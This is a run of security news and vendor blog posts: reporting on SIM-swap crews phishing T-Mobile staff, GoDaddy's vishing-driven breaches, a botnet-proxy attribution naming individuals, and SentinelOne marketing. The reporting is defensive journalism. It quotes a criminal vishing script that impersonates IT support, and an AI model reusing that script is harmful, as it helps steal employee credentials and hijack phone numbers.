Hackers Claim They Breached T-Mobile More Than 100 Times in 2022

Image: Shutterstock.com

Three different cybercriminal groups claimed access to internal networks at communications giant T-Mobile in more than 100 separate incidents throughout 2022, new data suggests. In each case, the goal of the attackers was the same: Phish T-Mobile employees for access to internal company tools, and then convert that access into a cybercrime service that could be hired to divert any T-Mobile user’s text messages and phone calls to another device.

The conclusions above are based on an extensive analysis of Telegram chat logs from three distinct cybercrime groups or actors that have been identified by security researchers as particularly active in and effective at “SIM-swapping,” which involves temporarily seizing control over a target’s mobile phone number.

Countless websites and online services use SMS text messages for both password resets and multi-factor authentication. This means that stealing someone’s phone number often can let cybercriminals hijack the target’s entire digital life in short order — including access to any financial, email and social media accounts tied to that phone number.

All three SIM-swapping entities that were tracked for this story remain active in 2023, and they all conduct business in open channels on the instant messaging platform Telegram. KrebsOnSecurity is not naming those channels or groups here because they will simply migrate to more private servers if exposed publicly, and for now those servers remain a useful source of intelligence about their activities.

Each advertises their claimed access to T-Mobile systems in a similar way. At a minimum, every SIM-swapping opportunity is announced with a brief “Tmobile up!” or “Tmo up!” message to channel participants. Other information in the announcements includes the price for a single SIM-swap request, and the handle of the person who takes the payment and information about the targeted subscriber.

The information required from the customer of the SIM-swapping service includes the target’s phone number, and the serial number tied to the new SIM card that will be used to receive text messages and phone calls from the hijacked phone number.

Initially, the goal of this project was to count how many times each entity claimed access to T-Mobile throughout 2022, by cataloging the various “Tmo up!” posts from each day and working backwards from Dec. 31, 2022.

But by the time we got to claims made in the middle of May 2022, completing the rest of the year’s timeline seemed unnecessary. The tally shows that in the last seven-and-a-half months of 2022, these groups collectively made SIM-swapping claims against T-Mobile on 104 separate days — often with multiple groups claiming access on the same days.

The 104 days in the latter half of 2022 in which different known SIM-swapping groups claimed access to T-Mobile employee tools.

KrebsOnSecurity shared a large amount of data gathered for this story with T-Mobile. The company declined to confirm or deny any of these claimed intrusions. But in a written statement, T-Mobile said this type of activity affects the entire wireless industry.

“And we are constantly working to fight against it,” the statement reads. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more. We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”


While it is true that each of these cybercriminal actors periodically offer SIM-swapping services for other mobile phone providers — including AT&T, Verizon and smaller carriers — those solicitations appear far less frequently in these group chats than T-Mobile swap offers. And when those offers do materialize, they are considerably more expensive.

The prices advertised for a SIM-swap against T-Mobile customers in the latter half of 2022 ranged between USD $1,000 and $1,500, while SIM-swaps offered against AT&T and Verizon customers often cost well more than twice that amount.

To be clear, KrebsOnSecurity is not aware of specific SIM-swapping incidents tied to any of these breach claims. However, the vast majority of advertisements for SIM-swapping claims against T-Mobile tracked in this story had two things in common that set them apart from random SIM-swapping ads on Telegram.

First, they included an offer to use a mutually trusted “middleman” or escrow provider for the transaction (to protect either party from getting scammed). More importantly, the cybercriminal handles that were posting ads for SIM-swapping opportunities from these groups generally did so on a daily or near-daily basis — often teasing their upcoming swap events in the hours before posting a “Tmo up!” message announcement.

In other words, if the crooks offering these SIM-swapping services were ripping off their customers or claiming to have access that they didn’t, this would be almost immediately obvious from the responses of the more seasoned and serious cybercriminals in the same chat channel.

There are plenty of people on Telegram claiming to have SIM-swap access at major telecommunications firms, but a great many such offers are simply four-figure scams, and any pretenders on this front are soon identified and banned (if not worse).

One of the groups that reliably posted “Tmo up!” messages to announce SIM-swap availability against T-Mobile customers also reliably posted “Tmo down!” follow-up messages announcing exactly when their claimed access to T-Mobile employee tools was discovered and revoked by the mobile giant.

A review of the timestamps associated with this group’s incessant “Tmo up” and “Tmo down” posts indicates that while their claimed access to employee tools usually lasted less than an hour, in some cases that access apparently went undiscovered for several hours or even days.


How could these SIM-swapping groups be gaining access to T-Mobile’s network as frequently as they claim? Peppered throughout the daily chit-chat on their Telegram channels are solicitations for people urgently needed to serve as “callers,” or those who can be hired to social engineer employees over the phone into navigating to a phishing website and entering their employee credentials.

Allison Nixon is chief research officer for the New York City-based cybersecurity firm Unit 221B. Nixon said these SIM-swapping groups will typically call employees on their mobile devices, pretend to be someone from the company’s IT department, and then try to get the person on the other end of the line to visit a phishing website that mimics the company’s employee login page.

Nixon argues that many people in the security community tend to discount the threat from voice phishing attacks as somehow “low tech” and “low probability” threats.

“I see it as not low-tech at all, because there are a lot of moving parts to phishing these days,” Nixon said. “You have the caller who has the employee on the line, and the person operating the phish kit who needs to spin it up and down fast enough so that it doesn’t get flagged by security companies. Then they have to get the employee on that phishing site and steal their credentials.”

In addition, she said, often there will be yet another co-conspirator whose job it is to use the stolen credentials and log into employee tools. That person may also need to figure out how to make their device pass “posture checks,” a form of device authentication that some companies use to verify that each login is coming only from employee-issued phones or laptops.

For aspiring criminals with little experience in scam calling, there are plenty of sample call transcripts available on these Telegram chat channels that walk one through how to impersonate an IT technician at the targeted company — and how to respond to pushback or skepticism from the employee. Here’s a snippet from one such tutorial that appeared recently in one of the SIM-swapping channels:

“Hello this is James calling from Metro IT department, how’s your day today?”

(yea im doing good, how r u)

i’m doing great, thank you for asking

i’m calling in regards to a ticket we got last week from you guys, saying you guys were having issues with the network connectivity which also interfered with [Microsoft] Edge, not letting you sign in or disconnecting you randomly. We haven’t received any updates to this ticket ever since it was created so that’s why I’m calling in just to see if there’s still an issue or not….”


The TMO UP data referenced above, combined with comments from the SIM-swappers themselves, indicate that while many of their claimed accesses to T-Mobile tools in the middle of 2022 lasted hours on end, both the frequency and duration of these events began to steadily decrease as the year wore on.

T-Mobile declined to discuss what it may have done to combat these apparent intrusions last year. However, one of the groups began to complain loudly in late October 2022 that T-Mobile must have been doing something that was causing their phished access to employee tools to die very soon after they obtained it.

One group even remarked that they suspected T-Mobile’s security team had begun monitoring their chats.

Indeed, the timestamps associated with one group’s TMO UP/TMO DOWN notices show that their claimed access was often limited to less than 15 minutes throughout November and December of 2022.

Whatever the reason, the calendar graphic above clearly shows that the frequency of claimed access to T-Mobile decreased significantly across all three SIM-swapping groups in the waning weeks of 2022.


T-Mobile US reported revenues of nearly $80 billion last year. It currently employs more than 71,000 people in the United States, any one of whom can be a target for these phishers.

T-Mobile declined to answer questions about what it may be doing to beef up employee authentication. But Nicholas Weaver, a researcher and lecturer at University of California, Berkeley’s International Computer Science Institute, said T-Mobile and all the major wireless providers should be requiring employees to use physical security keys for that second factor when logging into company resources.

A U2F device made by Yubikey.

“These breaches should not happen,” Weaver said. “Because T-Mobile should have long ago issued all employees security keys and switched to security keys for the second factor. And because security keys provably block this style of attack.”

The most commonly used security keys are inexpensive USB-based devices. A security key implements a form of multi-factor authentication known as Universal 2nd Factor (U2F), which allows the user to complete the login process simply by inserting the USB key and pressing a button on the device. The key works without the need for any special software drivers.

The allure of U2F devices for multi-factor authentication is that even if an employee who has enrolled a security key for authentication tries to log in at an impostor site, the company’s systems simply refuse to request the security key if the user isn’t on their employer’s legitimate website, and the login attempt fails. Thus, the second factor cannot be phished, either over the phone or Internet.


Nixon said one confounding aspect of SIM-swapping is that these criminal groups tend to recruit teenagers to do their dirty work.

“A huge reason this problem has been allowed to spiral out of control is because children play such a prominent role in this form of breach,” Nixon said.

Nixon said SIM-swapping groups often advertise low-level jobs on places like Roblox and Minecraft, online games that are extremely popular with young adolescent males.

“Statistically speaking, that kind of recruiting is going to produce a lot of people who are underage,” she said. “They recruit children because they’re naive, you can get more out of them, and they have legal protections that other people over 18 don’t have.”

For example, she said, even when underage SIM-swappers are arrested, the offenders tend to go right back to committing the same crimes as soon as they’re released.

In January 2023, T-Mobile disclosed that a “bad actor” stole records on roughly 37 million current customers, including their name, billing address, email, phone number, date of birth, and T-Mobile account number.

In August 2021, T-Mobile acknowledged that hackers made off with the names, dates of birth, Social Security numbers and driver’s license/ID information on more than 40 million current, former or prospective customers who applied for credit with the company. That breach came to light after a hacker began selling the records on a cybercrime forum.

In the shadow of such mega-breaches, any damage from the continuous attacks by these SIM-swapping groups can seem insignificant by comparison. But Nixon says it’s a mistake to dismiss SIM-swapping as a low volume problem.

“Logistically, you may only be able to get a few dozen or a hundred SIM-swaps in a day, but you can pick any customer you want across their entire customer base,” she said. “Just because a targeted account takeover is low volume doesn’t mean it’s low risk. These guys have crews that go and identify people who are high net worth individuals and who have a lot to lose.”

Nixon said another aspect of SIM-swapping that causes cybersecurity defenders to dismiss the threat from these groups is the perception that they are full of low-skilled “script kiddies,” a derisive term used to describe novice hackers who rely mainly on point-and-click hacking tools.

“They underestimate these actors and say this person isn’t technically sophisticated,” she said. “But if you’re rolling around in millions worth of stolen crypto currency, you can buy that sophistication. I know for a fact some of these compromises were at the hands of these ‘script kiddies,’ but they’re not ripping off other people’s scripts so much as hiring people to make scripts for them. And they don’t care what gets the job done, as long as they get to steal the money.”

Navigating the CISO Reporting Structure | Best Practices for Empowering Security Leaders

In the face of ever-increasing cyberattacks and data breaches, the need for experienced security professionals to helm security operations has risen as a top focus for many enterprise organizations. Chief Information Security Officers (CISOs) are now considered a critical role within senior leadership, but there are varied opinions on where they fit into the overall reporting structure.

As the role of a CISO has evolved, there have been many discussions about whom the CISO should report to. In most cases, a CISO generally reports to the Chief Information Officer (CIO); however, many argue that CISOs should not report to CIOs. This blog post explores ways that CIOs can better empower CISOs and help drive cybersecurity priorities within their organization.

Examining the Shared Journey Between Two Points

Let’s imagine an organization as a vehicle driving from point A to point B and beyond as they establish their brand, grow their customer base, and continuously scale up.

CIOs, in this analogy, are busy laying the road upon which the vehicle travels. They work to build the smoothest, most cost effective road allowing the “driver” – employees of the organization – to get to where they’re going faster than other “cars”. To do so, CIOs invest in leading edge technology that help employees work better and champion an ongoing process of digital transformation.

If the CIO is paving the way in this journey, the CISO makes sure that the vehicle is safe to operate, tuned, and regularly maintained to run without issue. A CISO’s objective is to ensure the vehicle can get to point B and beyond in a safe manner, protecting both the car and its driver from external dangers.

To achieve this, CISOs are responsible for building business-specific security policies, finding ways to reduce overall cyber risk, and building up cyber resilience through people, process, and the right technology.

Though CIOs and CISOs responsibilities are distinct, they share a similar objective: to enable the organization to grow and operate in a safe, streamlined way.

Role Relationships | How CIOs Can Enable CISOs

The role of CISOs has evolved in recent years to keep up with a rapidly changing threat landscape and moving goalposts dependent on an organization’s industry. Though traditionally this role has reported to a company’s CIO, some in the cyber community have questioned whether this drives or hinders an organization’s ability to prioritize cybersecurity needs.

The focus, however, should instead be on examining the key responsibilities of both roles, analyzing common conflicts of interest that arise between them, and finally, understanding how both CISOs and CIOs can work in tandem to enable business operations and cybersecurity.

Below, we examine three shared functional areas that each role manages differently and where there is room for alignment.

1. Managing Conflicting Priorities

Looking at the fundamental objectives of CIOs in contrast with CISOs, CIOs focus on enabling the business with a better customer experience, digital transformation, cost savings, IT efficiency, and seamless IT operations. CIOs are tasked with providing uninterrupted service to the organization’s employees to support continuous operations and sales.

On the other hand, a CISO’s job is centered around reducing the risk of unauthorized access, disruption, and maintaining the integrity of an organization’s implemented technology. For CISOs, it’s more about how securely data is stored, accessed, and transmitted.

For example, suppose a business user wishes to use a new application that enables them to complete their work in less time than before. The CIO office might approve this request as the intention is to cater to the business user’s needs. However, the CISO office would need to evaluate the risks spanning governance, access, data, and backups before approving this request.

The CIO office and the business user may push the CISO to approve the application. The example here showcases an application-level situation; at scale, it becomes apparent that the CIO’s decision would prevail over any CISO concerns.

Opportunities for Alignment

CISOs can be empowered when they are recognized as the voice of authority on security for the organization and collaborate as an equal to the CIO. Sharing knowledge, both CIOs and CISOs can identify areas needing improvement and work together to a common goal.

2. Understanding Budget Prioritization & Justifications

CISOs are responsible for mitigating risks brought about by legacy IT infrastructures and will often take additional measures to secure them. In organizations where the CISO reports into the CIO, the cybersecurity budget is a subset of the greater IT budget.

This situation creates a perception that security is expensive compared to IT infrastructure where, in reality, the expenses can be drawn back to the additional measures taken to mitigate the risks associated with the IT infrastructure.

For CIOs to better support CISOs, the budgetary distinction and separation from the IT department are essential for the following reasons:

  1. From a people perspective: Security training needs to be updated or modified based on the changes in the cyber threat landscape to ensure employees are able to recognize emerging phishing attacks.
  2. From a process perspective: There is a need for flexibility due to organizational priorities, market changes, or emerging cyberattacks. For example, changing risk appetites may suddenly highlight the need for an incident retainer.
  3. From a technology perspective: Due to global digitization and growing use of cloud applications, there is a need for new tools to better monitor and detect attacks in less time.

Opportunities for Alignment

Though a CISO may report into a CIO within an organization, senior leadership may choose to separate the IT budget from the cybersecurity budget. While the budgets are divided, it is critical for the CIO and CISO to work collaboratively, brainstorming to understand where they can align on business objectives to streamline expenses on both sides.

Further, CISOs reporting into CIOs can show the cost benefits of taking an offensive approach to an organization’s security. By sharing their expertise, a CISO can help CIOs build safer, more effective IT strategies and embed preventative security measures in every layer of the organization.

3. Prioritizing Business Risks

Without transparency and open communication between a CISO and CIO, preventative actions taken to ward off security incidents may be interpreted as a cost center, rather than a way to enable the business.

Moreover, CIOs that are not fully in tune with CISOs may not accurately represent data around cyber incidents to board members. Instead of reporting on how many times the security team responded to events, the narrative may focus on missed alerts or portray investment in new solutions as a cost center.

Opportunities for Alignment

CIO are positioned to understand security risks from a wide IT standpoint as they oversee relationships with vendors, contractors, and other service providers. When evaluating third-party risks, CIOs can supply CISOs with valuable intel about these relationships and help form realistic and achievable security standards.

A benefit of having a CISO reporting into a CIO is recognizing that usability and security are not at conflicting ends. In partnership, transparency and open collaboration between the two roles supports the goal of building cybersecurity hygiene. Security risks can then be evaluated and mitigated throughout an organization’s IT infrastructure.


A strong partnership between a CISO and CIO, regardless of reporting structure, maximizes an organization’s security and IT posture. The key here is that CIO and CISO must align on the business objectives of the organization. CIOs enabling the business through cutting edge technology can be effectively enabled and augmented by the work of a CISO.

Returning to our earlier analogy, if a vehicle isn’t safe to drive, it may not get very far even if the road ahead is a smooth one. Should the pathway be fraught with obstacles, even a well-tuned car would find the journey a difficult one. Working hand in hand, the business is able to take carefully calculated risks to gain long-term competitive advantage. The maximum value for CISO and CIO is derived when cybersecurity is treated as a strategic risk.

Though there is no one-size-fits-all approach and leaders have to consider factors including industry, culture, and cybersecurity maturity, board members and C-suite teams that choose to empower CISOs through transparency and partnership are better positioned to protect their organization against changing cybersecurity threats and establish a much stronger cyber hygiene posture in the long run.

Across various industries, CISOs choose to partner with SentinelOne to accelerate their cyber defenses against advanced threats. SentinelOne offers two free eBooks, 90 Days | A CISO’s Journey to Impact – Define Your Role and 90 Days | A CISO’s Journey to Impact – How to Drive Success, as resources for CISOs working to implement best practices in their business. For in-depth expertise and guidance, contact us for more information or request a free demo.

90 Days | A CISO’s Journey to Impact

When Low-Tech Hacks Cause High-Impact Breaches

Web hosting giant GoDaddy made headlines this month when it disclosed that a multi-year breach allowed intruders to steal company source code, siphon customer and employee login credentials, and foist malware on customer websites. Media coverage understandably focused on GoDaddy’s admission that it suffered three different cyberattacks over as many years at the hands of the same hacking group.  But it’s worth revisiting how this group typically got in to targeted companies: By calling employees and tricking them into navigating to a phishing website.

In a filing with the U.S. Securities and Exchange Commission (SEC), GoDaddy said it determined that the same “sophisticated threat actor group” was responsible for three separate intrusions, including:

-March 2020: A spear-phishing attack on a GoDaddy employee compromised the hosting login credentials of approximately 28,000 GoDaddy customers, as well as login credentials for a small number employees;

-November 2021: A compromised GoDaddy password let attackers steal source code and information tied to 1.2 million customers, including website administrator passwords, sFTP credentials, and private SSL keys;

-December 2022: Hackers gained access to and installed malware on GoDaddy’s cPanel hosting servers that “intermittently redirected random customer websites to malicious sites.”

“Based on our investigation, we believe these incidents are part of a multi-year campaign by a sophisticated threat actor group that, among other things, installed malware on our systems and obtained pieces of code related to some services within GoDaddy,” the company stated in its SEC filing.

What else do we know about the cause of these incidents? We don’t know much about the source of the November 2021 incident, other than GoDaddy’s statement that it involved a compromised password, and that it took about two months for the company to detect the intrusion. GoDaddy has not disclosed the source of the breach in December 2022 that led to malware on some customer websites.

But we do know the March 2020 attack was precipitated by a spear-phishing attack against a GoDaddy employee. GoDaddy described the incident at the time in general terms as a social engineering attack, but one of its customers affected by that March 2020 breach actually spoke to one of the hackers involved.

The hackers were able to change the Domain Name System (DNS) records for the transaction brokering site escrow.com so that it pointed to an address in Malaysia that was host to just a few other domains, including the then brand-new phishing domain servicenow-godaddy[.]com.

The general manager of Escrow.com found himself on the phone with one of the GoDaddy hackers, after someone who claimed they worked at GoDaddy called and said they needed him to authorize some changes to the account.

In reality, the caller had just tricked a GoDaddy employee into giving away their credentials, and he could see from the employee’s account that Escrow.com required a specific security procedure to complete a domain transfer.

The general manager of Escrow.com said he suspected the call was a scam, but decided to play along for about an hour — all the while recording the call and coaxing information out of the scammer.

“This guy had access to the notes, and knew the number to call,” to make changes to the account, the CEO of Escrow.com told KrebsOnSecurity. “He was literally reading off the tickets to the notes of the admin panel inside GoDaddy.”

About halfway through this conversation — after being called out by the general manager as an imposter — the hacker admitted that he was not a GoDaddy employee, and that he was in fact part of a group that enjoyed repeated success with social engineering employees at targeted companies over the phone.

Absent from GoDaddy’s SEC statement is another spate of attacks in November 2020, in which unknown intruders redirected email and web traffic for multiple cryptocurrency services that used GoDaddy in some capacity.

It is possible this incident was not mentioned because it was the work of yet another group of intruders. But in response to questions from KrebsOnSecurity at the time, GoDaddy said that incident also stemmed from a “limited” number of GoDaddy employees falling for a sophisticated social engineering scam.

“As threat actors become increasingly sophisticated and aggressive in their attacks, we are constantly educating employees about new tactics that might be used against them and adopting new security measures to prevent future attacks,” GoDaddy said in a written statement back in 2020.

Voice phishing or “vishing” attacks typically target employees who work remotely. The phishers will usually claim that they’re calling from the employer’s IT department, supposedly to help troubleshoot some issue. The goal is to convince the target to enter their credentials at a website set up by the attackers that mimics the organization’s corporate email or VPN portal.

Experts interviewed for an August 2020 story on a steep rise in successful voice phishing attacks said there are generally at least two people involved in each vishing scam: One who is social engineering the target over the phone, and another co-conspirator who takes any credentials entered at the phishing page — including multi-factor authentication codes shared by the victim — and quickly uses them to log in to the company’s website.

The attackers are usually careful to do nothing with the phishing domain until they are ready to initiate a vishing call to a potential victim. And when the attack or call is complete, they disable the website tied to the domain.

This is key because many domain registrars will only respond to external requests to take down a phishing website if the site is live at the time of the abuse complaint. This tactic also can stymie efforts by companies that focus on identifying newly-registered phishing domains before they can be used for fraud.

A U2F device made by Yubikey.

GoDaddy’s latest SEC filing indicates the company had nearly 7,000 employees as of December 2022. In addition, GoDaddy contracts with another 3,000 people who work full-time for the company via business process outsourcing companies based primarily in India, the Philippines and Colombia.

Many companies now require employees to supply a one-time password — such as one sent via SMS or produced by a mobile authenticator app — in addition to their username and password when logging in to company assets online. But both SMS and app-based codes can be undermined by phishing attacks that simply request this information in addition to the user’s password.

One multifactor option — physical security keys — appears to be immune to these advanced scams. The most commonly used security keys are inexpensive USB-based devices. A security key implements a form of multi-factor authentication known as Universal 2nd Factor (U2F), which allows the user to complete the login process simply by inserting the USB device and pressing a button on the device. The key works without the need for any special software drivers.

The allure of U2F devices for multi-factor authentication is that even if an employee who has enrolled a security key for authentication tries to log in at an impostor site, the company’s systems simply refuse to request the security key if the user isn’t on their employer’s legitimate website, and the login attempt fails. Thus, the second factor cannot be phished, either over the phone or Internet.

In July 2018, Google disclosed that it had not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of one-time codes.

Who’s Behind the Botnet-Based Service BHProxies?

A security firm has discovered that a six-year-old crafty botnet known as Mylobot appears to be powering a residential proxy service called BHProxies, which offers paying customers the ability to route their web traffic anonymously through compromised computers. Here’s a closer look at Mylobot, and a deep dive into who may be responsible for operating the BHProxies service.

The BHProxies website.

First identified in 2017 by the security firm Deep Instinct, Mylobot employs a number of fairly sophisticated methods to remain undetected on infected hosts, such as running exclusively in the computer’s temporary memory, and waiting 14 days before attempting to contact the botnet’s command and control servers.

Last year, researchers at Minerva Labs spotted the botnet being used to blast out sextortion scams. But according to a new report from BitSight, the Mylobot botnet’s main functionality has always been about transforming the infected system into a proxy.

The Mylobot malware includes more than 1,000 hard-coded and encrypted domain names, any one of which can be registered and used as control networks for the infected hosts. BitSight researchers found significant overlap in the Internet addresses used by those domains and a domain called BHproxies[.]com.

BHProxies sells access to “residential proxy” networks, which allow someone to rent a residential IP address to use as a relay for their Internet communications, providing anonymity and the advantage of being perceived as a residential user surfing the web. The service is currently advertising access to more than 150,000 devices globally.

“At this point, we cannot prove that BHProxies is linked to Mylobot, but we have a strong suspicion,” wrote BitSight’s Stanislas Arnoud.

To test their hypothesis, BitSight obtained 50 proxies from BHProxies. The researchers were able to use 48 of those 50 proxies to browse to a website they controlled — allowing them to record the true IP addresses of each proxy device.

“Among these 48 recovered residential proxies IP addresses, 28 (58.3%) of those were already present in our sinkhole systems, associated with the Mylobot malware family,” Arnoud continued. “This number is probably higher, but we don’t have a full visibility of the botnet. This gave us clear evidence that Mylobot infected computers are used by the BHProxies service.”

BitSight said it is currently seeing more than 50,000 unique Mylobot infected systems every day, and that India appears to be the most targeted country, followed by the United States, Indonesia and Iran.

“We believe we are only seeing part of the full botnet, which may lead to more than 150,000 infected computers as advertised by BHProxies’ operators,” Arnoud wrote.


The website BHProxies[.]com has been advertised for nearly a decade on the forum Black Hat World by the user BHProxies. BHProxies has authored 129 posts on Black Hat World since 2012, and their last post on the forum was in December 2022.

BHProxies initially was fairly active on Black Hat World between May and November 2012, after which it suddenly ceased all activity. The account didn’t resume posting on the forum until April 2014.

According to cyber intelligence firm Intel 471, the user BHProxies also used the handle “hassan_isabad_subar” and marketed various software tools, including “Subar’s free email creator” and “Subar’s free proxy scraper.”

Intel 471’s data shows that hassan_isabad_subar registered on the forum using the email address jesus.fn.christ@gmail.com. In a June 2012 private message exchange with a website developer on Black Hat World, hassan_isabad_subar confided that they were working at the time to develop two websites, including the now-defunct customscrabblejewelry.com.

DomainTools.com reports that customscrabblejewelry.com was registered in 2012 to a Teresa Shotliff in Chesterland, Ohio. A search on jesus.fn.christ@gmail.com at Constella Intelligence, a company that tracks compromised databases, shows this email address is tied to an account at the fundraising platform omaze.com, for a Brian Shotliff from Chesterland, Ohio.

Reached via LinkedIn, Mr. Shotliff said he sold his BHProxies account to another Black Hat World forum user from Egypt back in 2014. Shotliff shared an April 2014 password reset email from Black Hat World, which shows he forwarded the plaintext password to the email address legendboy2050@yahoo.com. He also shared a PayPal receipt and snippets of Facebook Messenger logs showing conversations in March 2014 with legendboy2050@yahoo.com.

Constella Intelligence confirmed that legendboy2050@yahoo.com was indeed another email address tied to the hassan_isabad_subar/BHProxies identity on Black Hat World. Constella also connects legendboy2050 to Facebook and Instagram accounts for one Abdala Tawfik from Cairo. This user’s Facebook page says Tawfik also uses the name Abdalla Khafagy.

Tawfik’s Instagram account says he is a former operations manager at the social media network TikTok, as well as a former director at Crypto.com.

Abdalla Khafagy’s LinkedIn profile says he was “global director of community” at Crypto.com for about a year ending in January 2022. Before that, the resume says he was operations manager of TikTok’s Middle East and North Africa region for approximately seven months ending in April 2020.

Khafagy’s LinkedIn profile says he is currently founder of LewkLabs, a Dubai-based “blockchain-powered, SocialFi content monetization platform” that last year reported funding of $3.26 million from private investors.

The only experience listed for Khafagy prior to the TikTok job is labeled “Marketing” at “Confidential,” from February 2014 to October 2019.

Reached via LinkedIn, Mr. Khafagy told KrebsOnSecurity that he had a Black Hat World account at some point, but that he didn’t recall ever having used an account by the name BHProxies or hassan_isabad_subar. Khafagy said he couldn’t remember the name of the account he had on the forum.

“I had an account that was simply hacked from me shortly after and I never bothered about it because it wasn’t mine in the first place,” he explained.

Khafagy declined to elaborate on the five-year stint in his resume marked “Confidential.” When asked directly whether he had ever been associated with the BHProxies service, Mr. Khafagy said no.

That Confidential job listing is interesting because its start date lines up with the creation of BHproxies[.]com. Archive.org indexed its first copy of BHProxies[.]com on Mar. 5, 2014, but historic DNS records show BHproxies[.]com first came online Feb. 25, 2014.

Shortly after that conversation with Mr. Khafagy, Mr. Shotliff shared a Facebook/Meta message he received that indicated Mr. Khafagy wanted him to support the claim that the BHProxies account had somehow gone missing.

“Hey mate, it’s been a long time. Hope you are doing well. Someone from Krebs on Security reached out to me about the account I got from you on BHW,” Khafagy’s Meta account wrote. “Didn’t we try to retrieve this account? I remember mentioning to you that it got stolen and I was never able to retrieve it.”

Mr. Shotliff said Khafagy’s sudden message this week was the first time he’d heard that claim.

“He bought the account,” Shotliff said. “He might have lost the account or had it stolen, but it’s not something I remember.”

If you liked this story, you may also enjoy these other investigations into botnet-based proxy services:

A Deep Dive Into the Residential Proxy Service ‘911’
911 Proxy Service Implodes After Disclosing Breach
Meet the Administrators of the RSOCKS Proxy Botnet
The Link Between AWM Proxy & the Glupteba Botnet
15-Year-Old Malware Proxy Network VIP72 Goes Dark
Who’s Behind the TDSS Botnet?

The Good, the Bad and the Ugly in Cybersecurity – Week 8

The Good

The man behind the development and sale of the NLBrute password-hacking tool was extradited to the United States this week. Known by his alias, dpxaker, U.S. officials charged Russian national Dariy Pankov with computer and access device fraud as well as one charge of conspiracy.


According to the DOJ’s press release on his indictment, Pankov wrote the malware to compromise protected computers by decrypting login credentials. Using NLBrute, he went on to steal the passwords of tens of thousands of computers globally, re-selling the credentials on dark websites to other cyber criminals. Investigations have found that login credentials to more than 35,000 computers were sold by Pankov over a three-year period, garnering him over $350,000 in illegal earnings.

While active, Pankov marketed, sold, and had other actors sell NLBrute on his behalf, proliferating the malware to interested malware buyers. NLBrute has appeared in various malicious cyber campaigns, including tax fraud schemes, brute force attacks, and Ransomware-as-a-Service (RaaS) operations attributed to REvil, Dharma, and Netwalker.

Though Pankov currently faces a 46-year sentence in federal prison should he be convicted of all charges, his nefarious brainchild is just one of many available credential hacking tools on the dark market. Credential theft continues to be a leading initial attack vector with threat actors targeting the vulnerable identity surface.

The Bad

Several versions of Carbon Black App Control for Windows are impacted by a critical injection vulnerability reported this week by security researcher, Jari Jääskelä. In VMware’s security advisory, the company labeled the vulnerability as ‘critical’, assigned it a score of 9.1 out of 10, and warned users that attackers leveraging the flaw could gain access to the underlying server operating system.

The critical injection flaw is tracked as CVE-2023-20858 and provides malicious actors with privileged access to the App Control administration console. Once inside, actors could potentially use specially-crafted input to bypass XML parsing restrictions to access sensitive assets or perform privilege escalation. Versions affected by CVE-2023-20858 include version 8.7.7 and older, version 8.8.5 and older, and version 8.9.3 and older. There are no workarounds for the vulnerability, and VMware has urged users to patch immediately to versions 8.7.8, 8.8.6, and 8.9.4 to avoid potential risks.

VMware’s Carbon Black App Control is used to lock down servers and critical systems. The injection vulnerabilities could allow an attacker to execute unapproved commands leading to complete systems compromise and access to connected customers.

News of the injection flaw follows a rapid wave of ransomware attacks reported just two weeks ago that leveraged a two-year-old VMware Service Location Protocol (SLP) vulnerability to compromise thousands of unpatched ESXi servers.

The Ugly

Organizations are racing to patch a remote code execution (RCE) vulnerability impacting multiple Zoho ManageEngine products. The vulnerability known as CVE-2022-47966 (assigned CVSS score 9.8) is observed to be in use by multiple threat actors with the majority of attacks on victims located in the U.S., U.K., Canada, Australia, Italy, Mexico, Nigeria, Ukraine, and the Netherlands.

CVE-2022-47966 enables unauthorized remote code execution through the use of an outdated, third-party dependency for XML signature validation called Apache Santuario. Unauthenticated attackers have exploited the flaw to completely take over two dozen Zoho on-premise products, execute lateral movement techniques, and deploy tools such as Cobalt Strike and Netcat. In this weeks’ attacks, threat actors were seen to install AnyDesk software or a Windows version of Buhti ransomware after gaining initial access.


Zoho has since published a security advisory detailing all affected products, versions, and fixes and notes that the exploit works only if Security Assertion Markup Language (SAML) single sign-on (SSO) was already enabled at the time of compromise. Used most commonly by large enterprises to streamline the employee login experience, targeting SAML SSO remains a lucrative target for threat actors seeking high-value payouts for successful attacks.

Based on security researchers’ findings, between 2000 to 4000 servers running ManageEngine products are accessible from the internet, making the attack surface a wide one for opportunistic attackers. Organizations are urged to patch immediately and implement continuous monitoring and detection capabilities.

Feature Spotlight | Integrated Mobile Threat Detection with Singularity™ Mobile and Microsoft Intune

SentinelOne is pleased to announce the launch of an integration between Singularity™ Mobile and Microsoft Intune. Singularity Mobile is a Mobile Threat Detection (MTD) solution built on the SentinelOne XDR Platform.

It detects threats on iOS and Android devices, combating mobile phishing and enforcing zero trust on infected or risky devices. With the Microsoft Intune connector for SentinelOne, users can easily deploy, sync, detect, and respond with MDM and MTD working together.

Mobile Attacks Are On The Rise

Credential theft via SMS phishing led to hundreds of enterprises being breached in 2022. Mobile attacks are on the rise with mobile malware now one of the fastest growing malware types. While ransomware has dominated a decade of attacks, access to data has become an equally important goal for attackers.

Mobile devices provide an easier attack surface for phishing campaigns and enjoy a level of access to enterprise assets now approaching that of workstations. To thwart this barrage of attacks with minimal overhead, enterprises want mobile security to work with mobile management.

Singularity Mobile and Microsoft Intune elevation of privilege

An Integrated Solution to Mobile Security

Connecting Microsoft Intune and SentinelOne is simple and game changing. Setup is as simple as a few clicks to cross launch and authenticate. Once connected, the two consoles begin syncing selected device groups, making it easy to deploy and begin setting up conditional access policies based on risk level.

Risk will be shared at the cloud and agent level and all access decisions will be automatic, making daily management largely autonomous.

Singularity Mobile and Microsoft Intune detection policy

This integrated approach to mobile differentiates Singularity Mobile from the competition. While other endpoint vendors offer mobile solutions, none invest as deeply in an integrated approach. Not only can mobile be managed end to end from the same platform as Windows, Mac, Linux, and Kubernetes protection, SentinelOne has invested in multiple MDM partnerships for better detection and response and flexibility in MDM vendors.

Singularity Makes Mobile Security Seamless

The Singularity mobile agent and Microsoft Intune console combine to make mobile security seamless. End users are notified of malicious apps, networks, phishing links, and advanced attack detections. Phishing is stopped in real time.

Singularity Mobile and Microsoft Intune threats and alerts

When in a more continuous risky state, the device loses access. When the user uninstalls a malicious app or disconnects from a malicious network, it automatically regains access. Detections on system level attacks leave the device in a risky state until the SOC analyst can investigate and remediate the threat.

